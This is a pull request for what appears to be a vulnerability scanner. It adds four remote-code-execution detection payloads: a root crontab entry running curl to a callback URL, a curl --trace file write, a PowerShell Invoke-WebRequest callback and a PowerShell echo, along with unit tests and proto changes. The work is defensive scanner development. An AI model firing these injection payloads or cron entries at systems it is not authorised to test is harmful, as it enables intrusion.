### PR TITLE
Additional RCE payloads

### DIFF
--- a/plugin/src/main/resources/com/google/tsunami/plugin/payload/payload_definitions.yaml
+++ b/plugin/src/main/resources/com/google/tsunami/plugin/payload/payload_definitions.yaml
@@ -40,6 +40,40 @@ payloads:
     vulnerability_type:
       - REFLECTIVE_RCE
       - BLIND_RCE
+  - name: linux_root_crontab
+    # Write the crontab payload to /etc/cron.d/tsunami_rce_cron 
+    interpretation_environment: LINUX_ROOT_CRONTAB
+    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
+    uses_callback_server: true
+    payload_string: "* * * * * root curl $TSUNAMI_PAYLOAD_TOKEN_URL \n"
+    vulnerability_type:
+      - ARBITRARY_FILE_WRITE
+  - name: linux_curl_trace_read
+    interpretation_environment: LINUX_SHELL
+    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
+    uses_callback_server: false
+    payload_string: curl --trace /tmp/tsunami-rce -- tsunami-rce-$TSUNAMI_PAYLOAD_TOKEN_RANDOM
+    validation_type: VALIDATION_REGEX
+    validation_regex: (?s).*tsunami-rce-$TSUNAMI_PAYLOAD_TOKEN_RANDOM.*
+    vulnerability_type:
+      - BLIND_RCE_FILE_READ
+  - name: windows_callback
+    interpretation_environment: WINDOWS_SHELL
+    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
+    uses_callback_server: true
+    payload_string: powershell -Command "Invoke-WebRequest -URI $TSUNAMI_PAYLOAD_TOKEN_URL"
+    vulnerability_type:
+      - REFLECTIVE_RCE
+      - BLIND_RCE  
+  - name: windows_echo
+    interpretation_environment: WINDOWS_SHELL
+    execution_environment: EXEC_INTERPRETATION_ENVIRONMENT
+    uses_callback_server: false
+    payload_string: powershell -Command "echo TSUNAMI_PAYLOAD_START$(echo $TSUNAMI_PAYLOAD_TOKEN_RANDOM)TSUNAMI_PAYLOAD_END"
+    validation_type: VALIDATION_REGEX
+    validation_regex: (?s).*TSUNAMI_PAYLOAD_START$TSUNAMI_PAYLOAD_TOKEN_RANDOMTSUNAMI_PAYLOAD_END.*
+    vulnerability_type:
+      - REFLECTIVE_RCE  
   - name: linux_printf
     interpretation_environment: LINUX_SHELL
     execution_environment: EXEC_INTERPRETATION_ENVIRONMENT

--- a/plugin/src/test/java/com/google/tsunami/plugin/payload/PayloadGeneratorWithCallbackServerTest.java
+++ b/plugin/src/test/java/com/google/tsunami/plugin/payload/PayloadGeneratorWithCallbackServerTest.java
@@ -57,6 +57,30 @@ public final class PayloadGeneratorWithCallbackServerTest {
           .setExecutionEnvironment(
               PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
           .build();
+  private static final PayloadGeneratorConfig LINUX_ARBITRARY_FILE_WRITE_CRON_CONFIG =
+      PayloadGeneratorConfig.newBuilder()
+          .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.ARBITRARY_FILE_WRITE)
+          .setInterpretationEnvironment(
+              PayloadGeneratorConfig.InterpretationEnvironment.LINUX_ROOT_CRONTAB)
+          .setExecutionEnvironment(
+              PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+          .build();  
+  private static final PayloadGeneratorConfig LINUX_BLIND_RCE_FILE_READ_CONFIG =
+      PayloadGeneratorConfig.newBuilder()
+          .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE_FILE_READ)
+          .setInterpretationEnvironment(
+              PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+          .setExecutionEnvironment(
+              PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+          .build();  
+  private static final PayloadGeneratorConfig WINDOWS_REFLECTIVE_RCE_CONFIG =
+      PayloadGeneratorConfig.newBuilder()
+          .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+          .setInterpretationEnvironment(
+              PayloadGeneratorConfig.InterpretationEnvironment.WINDOWS_SHELL)
+          .setExecutionEnvironment(
+              PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+          .build();  
   private static final PayloadGeneratorConfig ANY_SSRF_CONFIG =
       PayloadGeneratorConfig.newBuilder()
           .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
@@ -66,6 +90,10 @@ public final class PayloadGeneratorWithCallbackServerTest {
           .build();
   private static final String CORRECT_PRINTF =
       "printf %s%s%s TSUNAMI_PAYLOAD_START ffffffffffffffff TSUNAMI_PAYLOAD_END";
+  private static final String CORRECT_CURL_TRACE =
+      "curl --trace /tmp/tsunami-rce -- tsunami-rce-ffffffffffffffff";
+  private static final String CORRECT_WINDOWS_ECHO =
+      "powershell -Command \"echo TSUNAMI_PAYLOAD_START$(echo ffffffffffffffff)TSUNAMI_PAYLOAD_END\"";
 
   @Before
   public void setUp() throws IOException {
@@ -121,6 +149,70 @@ public final class PayloadGeneratorWithCallbackServerTest {
 
     assertFalse(payload.checkIfExecuted());
   }
+
+  @Test
+  public void generate_withCrontabConfiguration_returnsCronCurlPayload() {
+    Payload payload = payloadGenerator.generate(LINUX_ARBITRARY_FILE_WRITE_CRON_CONFIG);
+
+    assertThat(payload.getPayload()).contains("* * * * * root curl");
+    assertThat(payload.getPayload()).contains(mockCallbackServer.getHostName());
+    assertThat(payload.getPayload()).contains(Integer.toString(mockCallbackServer.getPort(), 10));
+    assertTrue(payload.getPayloadAttributes().getUsesCallbackServer());
+  }
+
+  @Test
+  public void checkIfExecuted_withCrontabConfiguration_andExecutedCallbackUrl_returnsTrue()
+      throws IOException {
+
+    mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse());
+    Payload payload = payloadGenerator.generate(LINUX_ARBITRARY_FILE_WRITE_CRON_CONFIG);
+
+    assertTrue(payload.checkIfExecuted());
+  }
+
+  @Test
+  public void checkIfExecuted_withCrontabConfiguration_andNotExecutedCallbackUrl_returnsFalse() {
+
+    mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse());
+    Payload payload = payloadGenerator.generate(LINUX_ARBITRARY_FILE_WRITE_CRON_CONFIG);
+
+    assertFalse(payload.checkIfExecuted());
+  }  
+
+  @Test
+  public void generate_withCurlTraceConfiguration_returnsCurlTracePayload() {
+    Payload payload = payloadGenerator.generateNoCallback(LINUX_BLIND_RCE_FILE_READ_CONFIG);
+
+    assertThat(payload.getPayload()).isEqualTo(CORRECT_CURL_TRACE);
+    assertFalse(payload.getPayloadAttributes().getUsesCallbackServer());
+  }
+
+  @Test
+  public void generate_withWindowsConfiguration_returnsEchoPayload() {
+    Payload payload = payloadGenerator.generateNoCallback(WINDOWS_REFLECTIVE_RCE_CONFIG);
+
+    assertThat(payload.getPayload()).isEqualTo(CORRECT_WINDOWS_ECHO);
+    assertFalse(payload.getPayloadAttributes().getUsesCallbackServer());
+  }
+
+  @Test
+  public void checkIfExecuted_withWindowsConfiguration_andExecutedCallbackUrl_returnsTrue()
+      throws IOException {
+
+    mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse());
+    Payload payload = payloadGenerator.generate(WINDOWS_REFLECTIVE_RCE_CONFIG);
+
+    assertTrue(payload.checkIfExecuted());
+  }
+
+  @Test
+  public void checkIfExecuted_withWindowsConfiguration_andNotExecutedCallbackUrl_returnsFalse() {
+
+    mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse());
+    Payload payload = payloadGenerator.generate(WINDOWS_REFLECTIVE_RCE_CONFIG);
+
+    assertFalse(payload.checkIfExecuted());
+  }  
 
   @Test
   public void getPayload_withSsrfConfiguration_returnsCallbackUrl() {

--- a/proto/payload_generator.proto
+++ b/proto/payload_generator.proto
@@ -38,6 +38,10 @@ message PayloadGeneratorConfig {
     BLIND_RCE = 2;
     // Server-Side Request Forgery
     SSRF = 3;
+    // Arbitrary File Write
+    ARBITRARY_FILE_WRITE = 4;
+    // RCE without output of the execution + File Read (needed to get confirmation string)
+    BLIND_RCE_FILE_READ = 5;
   }
 
   // The environment that processes the payload for execution e.g. a PHP-based
@@ -51,8 +55,12 @@ message PayloadGeneratorConfig {
     JAVA = 2;
     // Payload is interpreted wihin a PHP VM context
     PHP = 3;
+    // Payload is interpreted wihin crontab 
+    LINUX_ROOT_CRONTAB = 4;
+    // Payload is interpreted wihin a Windows shell environment 
+    WINDOWS_SHELL = 5;
     // Interpretation environment doesn't matter
-    INTERPRETATION_ANY = 4;
+    INTERPRETATION_ANY = 6;
   }
 
   // The actual runtime environment when the payload is run e.g. while a


### PR DESCRIPTION
This branch adds 4 additional RCE payloads:

- `linux_root_crontab` - Arbitrary File Write with root access to RCE via crontab

- `linux_curl_trace_read` - A curl payload for blind RCE detection with an additional File Read vuln. This payload saves an RCE detection string in /tmp that can be read via the additional File Read vuln in order to confirm that the curl command executed.
 
- `windows_callback` - Confirms RCE by opening the callback URL with powershell Invoke-WebRequest.
 
- `windows_echo` - Confirms reflected RCE by printing a RCE detection string with a random value.

